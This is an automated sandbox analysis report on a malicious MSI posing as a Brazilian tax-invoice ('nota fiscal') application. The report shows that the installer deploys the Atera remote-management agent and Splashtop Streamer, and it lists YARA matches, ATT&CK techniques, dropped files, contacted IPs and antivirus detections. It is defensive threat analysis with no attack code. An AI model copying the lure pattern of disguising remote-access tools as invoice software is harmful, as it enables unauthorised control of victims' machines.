                                Source: Yara matchFile source: 00000023.00000002.2086789811.000001F71CC81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E223ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7800, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7856, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7948, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 8184, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 3652, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7452, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7344, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 3084, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7248, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 3492, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7700, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageSTRemote.exe PID: 7568, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageMonitoring.exe PID: 8096, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6912, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 416, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 8020, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageTicketing.exe PID: 5768, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageUpgradeAgent.exe PID: 1340, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageInternalPoller.exe PID: 1784, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageProgramManagement.exe PID: 3248, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1900, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: SplashtopStreamer.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageSystemTools.exe PID: 1696, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageMonitoring.exe PID: 4048, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF4ABAF93AAD4B12FE.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFD7C2903EF9D68D12.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIA7C1.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF14B7E2773E7C33C4.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\AteraSetupLog.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE507A9E0C295E778.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\692c47.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFB27147300DD38853.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF2C154A89BDA544DA.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFF490C3560564DA83.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFEE64D0168B710AC4.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF9A4574B4F262FBE9.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSICA70.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFDAABEC74117CC1C6.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF18C3B2AA98B412A3.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF13A48084247EF5A1.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF767FEA75492F0964.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_15-log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\692c4f.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\692c42.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF9CDD7DFF0A80F0FA.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF884CE156ACD16DC3.TMP, type: DROPPED
                                Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_25-log.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF66386BAAA34E81A4.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI41D0.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42B9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA,35_2_00007FFDEE42B9F0

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		1
                                Replication Through Removable Media                                		641
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		21
                                Disable or Modify Tools                                		OS Credential Dumping2
                                System Time Discovery                                		Remote Services11
                                Archive Collected Data                                		2
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		22
                                Windows Service                                		11
                                Deobfuscate/Decode Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		22
                                Windows Service                                		111
                                Process Injection                                		31
                                Obfuscated Files or Information                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts11
                                Scheduled Task/Job                                		11
                                Scheduled Task/Job                                		11
                                Scheduled Task/Job                                		1
                                Timestomp                                		NTDS265
                                System Information Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts11
                                Service Execution                                		Network Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets1
                                Query Registry                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion                                		Cached Domain Credentials781
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items123
                                Masquerading                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Modify Registry                                		Proc Filesystem371
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt371
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow1
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                Rundll32                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584760 Sample: APLICATIVO-WINDOWS-NOTA-FIS... Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 147 Malicious sample detected (through community Yara rule) 2->147 149 Multi AV Scanner detection for dropped file 2->149 151 Multi AV Scanner detection for submitted file 2->151 153 10 other signatures 2->153 8 AteraAgent.exe 2->8         started        12 msiexec.exe 173 118 2->12         started        14 AteraAgent.exe 2->14         started        17 4 other processes 2->17 process3 dnsIp4 91 C:\...\System.Management.dll, PE32 8->91 dropped 93 C:\...93ewtonsoft.Json.dll, PE32 8->93 dropped 95 C:\...\Microsoft.Win32.TaskScheduler.dll, PE32 8->95 dropped 103 322 other malicious files 8->103 dropped 163 Installs Task Scheduler Managed Wrapper 8->163 19 AgentPackageProgramManagement.exe 8->19         started        24 AgentPackageUpgradeAgent.exe 8->24         started        36 5 other processes 8->36 97 C:\Windows\Installer\MSID178.tmp, PE32 12->97 dropped 99 C:\Windows\Installer\MSI9409.tmp, PE32 12->99 dropped 101 C:\Windows\Installer\MSI5885.tmp, PE32 12->101 dropped 105 59 other files (50 malicious) 12->105 dropped 26 msiexec.exe 12->26         started        28 AteraAgent.exe 12->28         started        30 msiexec.exe 12->30         started        32 msiexec.exe 12->32         started        143 13.35.58.104 AMAZON-02US United States 14->143 145 35.157.63.227 AMAZON-02US United States 14->145 107 31 other malicious files 14->107 dropped 165 Creates files in the system32 config directory 14->165 167 Reads the Security eventlog 14->167 169 Reads the System eventlog 14->169 38 8 other processes 14->38 34 conhost.exe 17->34         started        file5 signatures6 process7 dnsIp8 139 2 other IPs or domains 19->139 83 15 other malicious files 19->83 dropped 155 Creates files in the system32 config directory 19->155 40 conhost.exe 19->40         started        127 20.60.197.1 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->127 73 C:\...\System.ValueTuple.dll, PE32 24->73 dropped 75 C:\Program Files (x86)\...\Pubnub.dll, PE32 24->75 dropped 77 C:\...77ewtonsoft.Json.dll, PE32 24->77 dropped 85 4 other malicious files 24->85 dropped 50 2 other processes 24->50 52 4 other processes 26->52 129 199.232.214.172 FASTLYUS United States 28->129 131 192.229.221.95 EDGECASTUS United States 28->131 87 2 other malicious files 28->87 dropped 157 Reads the Security eventlog 28->157 159 Reads the System eventlog 28->159 42 rundll32.exe 30->42         started        46 rundll32.exe 30->46         started        55 2 other processes 32->55 133 13.107.246.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 36->133 79 C:\...\TicketingTray.exe (copy), PE32 36->79 dropped 89 2 other malicious files 36->89 dropped 161 Queries disk data (e.g. SMART data) 36->161 57 5 other processes 36->57 135 35.71.184.3 MERIT-AS-14US United States 38->135 137 13.35.58.89 AMAZON-02US United States 38->137 81 C:\Windows\Temp\SplashtopStreamer.exe, PE32 38->81 dropped 48 powershell.exe 38->48         started        59 10 other processes 38->59 file9 signatures10 process11 dnsIp12 109 C:\...\AlphaControlAgentInstallation.dll, PE32 42->109 dropped 121 3 other files (none is malicious) 42->121 dropped 171 System process connects to network (likely due to code injection or exploit) 42->171 111 C:\...\AlphaControlAgentInstallation.dll, PE32 46->111 dropped 123 3 other files (none is malicious) 46->123 dropped 173 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 48->173 175 Loading BitLocker PowerShell Module 48->175 61 conhost.exe 48->61         started        141 40.119.152.241 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 52->141 113 C:\...\AlphaControlAgentInstallation.dll, PE32 52->113 dropped 115 C:\...\AlphaControlAgentInstallation.dll, PE32 52->115 dropped 117 C:\...\AlphaControlAgentInstallation.dll, PE32 52->117 dropped 125 13 other files (1 malicious) 52->125 dropped 63 conhost.exe 55->63         started        65 net1.exe 55->65         started        67 conhost.exe 55->67         started        119 C:\Windows\Temp\unpack\PreVerCheck.exe, PE32 59->119 dropped 69 conhost.exe 59->69         started        71 cscript.exe 59->71         started        file13 signatures14 process15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                APLICATIVO-WINDOWS-NOTA-FISCAL.msi18%VirustotalBrowse
                                APLICATIVO-WINDOWS-NOTA-FISCAL.msi24%ReversingLabsWin32.Trojan.Atera

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                692c48.rbf (copy)26%ReversingLabsWin32.PUA.Atera
                                692c48.rbf (copy)28%VirustotalBrowse
                                692c4a.rbf (copy)0%ReversingLabs
                                692c4a.rbf (copy)0%VirustotalBrowse
                                692c4b.rbf (copy)0%ReversingLabs
                                692c4b.rbf (copy)0%VirustotalBrowse
                                692c4c.rbf (copy)0%ReversingLabs
                                692c4c.rbf (copy)0%VirustotalBrowse
                                692c4d.rbf (copy)0%ReversingLabs
                                692c4e.rbf (copy)0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe26%ReversingLabsWin32.PUA.Atera
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.Extensions.ManagedClient.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Binder.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.CommandLine.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.EnvironmentVariables.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.UserSecrets.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Physical.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Configuration.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Console.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Debug.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.ConfigurationExtensions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Primitives.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Hosting.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Sinks.File.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\System.Diagnostics.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                No Antivirus matches

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.oracle.com/technetwork/java/javase/terms/license/index.htmlAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  https://community.chocolatey.org/api/v2/package/javaruntime-platformspecific/7.0.79.20161125AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
